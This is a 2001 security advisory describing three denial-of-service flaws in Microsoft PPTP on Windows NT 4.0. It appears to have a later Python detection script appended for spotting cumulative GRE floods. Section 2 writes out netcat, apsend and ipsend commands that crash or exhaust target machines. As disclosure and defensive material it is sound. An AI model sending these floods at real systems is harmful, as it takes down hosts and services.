[ SOURCE: http://www.secureroot.com/security/advisories/9876756313.html ]

Diversified Software Industries, Inc.
http://www.dsi-inc.net/dsi

Security Advisory
February 22, 2001

Denial of Service attack against computers running Microsoft PPTP (NT 4.0)

1. Description
2. Steps to reproduce (exploits)
3. Vendor status, solution, workarounds
4. Disclaimer
5. Credits
6. About DSI

----------------------------------------

1. Description

PPTP (Point-to-Point Tunneling Protocol) is a networking technology that is used to create VPNs. The protocol uses TCP (port 1723) and GRE to perform its work. PPTP is specified in RFC 2637 (see http://www.ietf.org/rfc/rfc2637.txt ).

This advisory presents three separate vulnerabilities. All three vulnerabilities affect Windows NT 4.0 Workstation and Server computers configured to accept incoming PPTP connections. The first vulnerability involves malformed TCP packets; this vulnerability only affects certain hardware, and only affects systems pre-SP6. The second and third vulnerabilities involve malformed GRE packets; these affect computers with any Service Pack.

Note that Microsoft's original bulletin did not list NT 4.0 Workstation as vulnerable. However, if configured to accept incoming PPTP connections, NT Workstation is vulnerable. No versions of Windows 2000 are believed vulnerable.

----------------------------------------

2. Steps to reproduce (exploits)

Tools needed:

  Unix box (e.g., Linux, *BSD)
  netcat ( http://www.l0pht.com/~weld/netcat/ or http://www.securityfocus.com/tools/137 )
  apsend ( http://www.elxsi.de/ or http://www.securityfocus.com/tools/976 )
  ipsend ( http://coombs.anu.edu.au/%7Eavalon/ or http://www.securityfocus.com/tools/129 )

Vulnerability 1: TCP Port 1723

This vulnerability only applies to machines prior to SP6. Not all machines are affected; it appears there may be some BIOS or other issue at work here.
To reproduce, enter the following on the Unix box:

  nc 1723 < /dev/zero

If vulnerable, the target host will blue screen in a few seconds with an error such as:

  STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL

Again, this vulnerability is machine-dependent; a list of tested hardware and results can be found in the online version of this advisory at http://www.dsi-inc.net/dsi/pptp_security_report.html

Vulnerability 2: GRE

This vulnerability applies to all service packs.

To reproduce, on the target machine, open Task Manager and select the Performance tab. Also, open a DOS window (Start: Run: cmd). On the Unix box:

  apsend -d --protocol 47 -m 0 -q

On the target host, you will see the numbers for kernel memory slowly rise in Task Manager. Eventually, these numbers will stop increasing; at this point, CPU may hit 100% for some period of time. Now try issuing a command such as DIR at the command prompt; you'll see a message indicating the OS isn't able to complete the command. Also, you may find the following in your System event log:

  Event ID: 2000  "The server's call to a system service failed unexpectedly."

and/or

  Event ID: 2019  "The server was unable to allocate from the system nonpaged pool because the pool was empty."

Eventually, the target host may reboot/blue screen, or it may simply remain in an unusable state.

As noted by Microsoft in their description of the issue, a large number of packets is required. For a server with 64 MB RAM installed, something on the order of 350,000 to 400,000 packets is needed. Note that the effect is cumulative; e.g., an attacker could send 200,000 packets at 10 A.M. and 200,000 at 2 P.M.

Vulnerability 3: GRE

This vulnerability also applies to all service packs.

To reproduce, on the Unix box:

  #!/bin/csh
  foo:
  ipsend -i -P gre > /dev/null
  goto foo

The target host will blue screen quickly. Approximately 50 packets are required.

----------------------------------------

3. Vendor status, solution, workaround

Microsoft has released a patch on February 13, 2000. Microsoft's bulletin is available at http://www.microsoft.com/technet/security/bulletin/MS01-009.asp

As a workaround, it is possible to filter GRE by source address at your perimeter. However, since GRE is a connectionless protocol, source address spoofing is trivial. Thus, if an attacker can guess what source addresses are allowed, filtering may not be effective.

----------------------------------------

4. Disclaimer

The information in this advisory is believed to be accurate. No warranty is given, express or implied. Neither the author nor the publisher accepts any liability whatsoever for any use of this information, nor do we condone the use of this information for unethical purposes.

----------------------------------------

5. Credits

Microsoft, for their efforts to fix this problem
Chris Manjoine of the University of Iowa, for his help testing the exploits
Hobbit, Anarchy, and Darren Reed, for their useful tools

----------------------------------------

6. About DSI

Diversified Software Industries, Inc. is an Iowa City/Coralville, Iowa-based company that develops and markets software for the graphical representation of data in vehicles. In addition, DSI markets custom software development and project management skills to firms in the over-the-road transportation marketplace. These custom solutions provide back office and on-vehicle wireless messaging management, as well as dispatching and resource tracking systems. You can find more information about DSI at http://www.dsi-inc.net/dsi
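Appendix (added example, not part of the DSI advisory or its tools): because the GRE pool exhaustion in section 2 is cumulative and the source-address filtering in section 3 can be spoofed around, a defender wants a per-destination running count of GRE traffic, not just a rate check. The Python script below does that over constructed flow records; the record format and BURST_THRESHOLD are assumptions, while CUMULATIVE_THRESHOLD is the low end of the advisory's 64 MB figure.

```python
# Added example, not part of the DSI advisory: tally GRE (IP protocol 47)
# packets per destination from flow records and alert on bursts AND on the
# running total, since the advisory notes the pool exhaustion is cumulative
# (200,000 packets at 10 A.M. plus 200,000 at 2 P.M. still add up).
# The record format and BURST_THRESHOLD are assumptions for this example.
from collections import defaultdict
from datetime import datetime

GRE_PROTO = 47
BURST_THRESHOLD = 100_000        # packets in one flow record (assumed)
CUMULATIVE_THRESHOLD = 350_000   # low end of the advisory's 64 MB figure

# Constructed sample flow records: "timestamp,src,dst,proto,packets".
# Each GRE flood against 192.0.2.10 is under the cumulative threshold
# on its own; only their sum crosses it.
SAMPLE_FLOWS = """\
2001-02-22T10:00:00,10.0.0.5,192.0.2.10,47,200000
2001-02-22T10:05:00,10.0.0.5,192.0.2.10,6,40
2001-02-22T14:00:00,10.0.0.7,192.0.2.10,47,200000
2001-02-22T14:10:00,10.0.0.9,192.0.2.11,47,60
"""

def parse_flows(text):
    """Parse the CSV lines into (time, src, dst, proto, packets) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, pkts = line.split(",")
        records.append((datetime.fromisoformat(ts), src, dst, int(proto), int(pkts)))
    return records

def gre_alerts(records):
    """Return (alerts, totals): alert tuples and GRE packets seen per destination."""
    totals = defaultdict(int)
    fired = set()                  # destinations already reported as cumulative
    alerts = []
    for ts, src, dst, proto, pkts in records:
        if proto != GRE_PROTO:
            continue               # only GRE feeds the PPTP nonpaged-pool leak
        totals[dst] += pkts
        if pkts >= BURST_THRESHOLD:
            alerts.append(("burst", dst, src, pkts, ts.isoformat()))
        # A rate-only check misses the split flood; the running total catches it.
        if totals[dst] >= CUMULATIVE_THRESHOLD and dst not in fired:
            fired.add(dst)
            alerts.append(("cumulative", dst, totals[dst], ts.isoformat()))
    return alerts, dict(totals)
```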